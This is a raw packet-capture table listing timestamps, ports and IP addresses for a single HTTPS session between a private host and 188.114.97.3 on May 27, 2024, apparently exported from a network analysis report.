May 27, 2024 18:35:37.945318937 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.946890116 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.946943045 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.946959019 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.946980953 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.947010040 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.949948072 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.950001955 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.950011015 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.950046062 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.950072050 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.983283997 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.983351946 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.983369112 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.983381033 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.983407021 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.032077074 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.032145977 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.032150984 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.032171965 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.032197952 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.033255100 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.033305883 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.033315897 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.033364058 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.033421040 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.033432007 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.034344912 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.034399033 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.034408092 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.034447908 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.034496069 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.034506083 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.035993099 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.036039114 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.036047935 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.036071062 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.036115885 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.036123991 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.036973000 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.037024021 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.037034035 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.037050009 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.037094116 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.037102938 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.038754940 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.038810015 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.038820028 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.038845062 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.038889885 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.038897991 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.048439026 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.048496962 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.048506021 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.048536062 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.048584938 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.048593044 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.074561119 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.074636936 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.074645996 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.074677944 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.074700117 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.122523069 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.122587919 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.122723103 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.122724056 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.122759104 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.125329971 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.125402927 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.125406027 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.125433922 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.125447035 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.125452042 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.125540972 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.127321959 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.127376080 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.127384901 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.127407074 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.127432108 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.127587080 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.127648115 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.127664089 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.127691031 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.127763987 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.127773046 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.128632069 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.128694057 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.128705978 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.128720045 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.128753901 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.130413055 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.130491018 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.130502939 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.130526066 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.130605936 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.141437054 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.141499996 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.141518116 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.141544104 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.141557932 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.165224075 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.165298939 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.165395021 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.165395021 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.165427923 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.213368893 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.213434935 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.213584900 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.213584900 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.213608027 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.213641882 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.214643955 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.214714050 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.214720011 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.214739084 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.214756012 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.214775085 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.214807034 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.215624094 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.215689898 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.215698957 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.215712070 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.215748072 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.217327118 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.217396021 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.217396975 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.217423916 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.217470884 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.219183922 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.219249964 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.219269991 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.219279051 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.219305992 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.220052958 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.220110893 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.220122099 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.220145941 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.220184088 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.232341051 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.232403040 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.232409954 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.232429981 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.232563019 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.256068945 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.256139994 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.256241083 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.256241083 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.256253004 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.304646969 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.304728985 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.304759026 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.304778099 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.305016041 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.305016041 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.305696011 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.305764914 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.305773020 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.305804968 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.305825949 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.305839062 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.305993080 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.306735992 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.306813955 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.306814909 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.306840897 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.306874990 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.307771921 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.307837009 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.307843924 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.307867050 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.307909012 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.309551954 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.309613943 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.309633017 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.309648037 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.309676886 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.310472012 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.310538054 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.310553074 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.310579062 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.310633898 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.310643911 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.323709965 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.323771954 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.323791027 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.323801994 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.323946953 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.347206116 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.347278118 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.347289085 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.347301006 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.347443104 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.395814896 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.395884037 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.396094084 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.396095037 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.396128893 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.396661043 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.396729946 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.396739006 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.396763086 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.396804094 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.398087025 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.398147106 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.398185015 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.398195028 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.398216009 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.399107933 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.399172068 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.399173975 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.399203062 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.399245024 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.400006056 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.400065899 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.400068998 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.400093079 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.400130033 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.401731968 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.401793957 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.401803970 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.401825905 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.401855946 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.414767027 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.414829016 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.414844990 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.414855003 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.415105104 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.438225985 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.438291073 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.438313961 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.438333988 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.438565016 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.488679886 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.488748074 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.488753080 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.488778114 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.488800049 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.489677906 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.489743948 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.489753962 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.489778996 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.489794970 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.489811897 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.489828110 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.490509033 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.490566015 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.490571976 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.490593910 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.490621090 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.491386890 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.491456985 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.491472006 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.491498947 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.491544962 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.491553068 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.492531061 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.492587090 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.492594004 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.492618084 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.492650032 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.494221926 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.494278908 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.494291067 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.494313002 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.494347095 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.507590055 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.507666111 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.507677078 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.507704973 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.507730007 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.534787893 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.534826040 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.534837008 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.534847021 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.534903049 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.534903049 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.579691887 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.579762936 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.579767942 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.579809904 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.579818010 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.580588102 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.580646038 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.580666065 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.580686092 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.580723047 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.581881046 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.581942081 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.581948042 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.581970930 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.581994057 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.582864046 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.582921028 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.582933903 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.582959890 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.582992077 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.584364891 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.584472895 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.584481001 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.584507942 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.584534883 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.585355043 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.585418940 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.585428953 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.585457087 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.585488081 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.598227978 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.598290920 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.598301888 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.598320007 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.598366022 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.598372936 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.620426893 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.620501041 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.620635986 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.620635986 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.620651007 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.620718002 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.670721054 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.670804977 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.670962095 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.670962095 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.670962095 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.670979023 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.671639919 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.671695948 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.671709061 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.671741009 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.671806097 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.672830105 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.672888994 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.672893047 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.672921896 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.672955036 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.673830986 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.673891068 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.673906088 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.673929930 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.673963070 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.674690008 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.674750090 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.674757004 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.674781084 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.674814939 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.676076889 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.676134109 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:38.676146030 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:38.676171064 CEST	443	49174	188.114.97.3	192.168.2.22
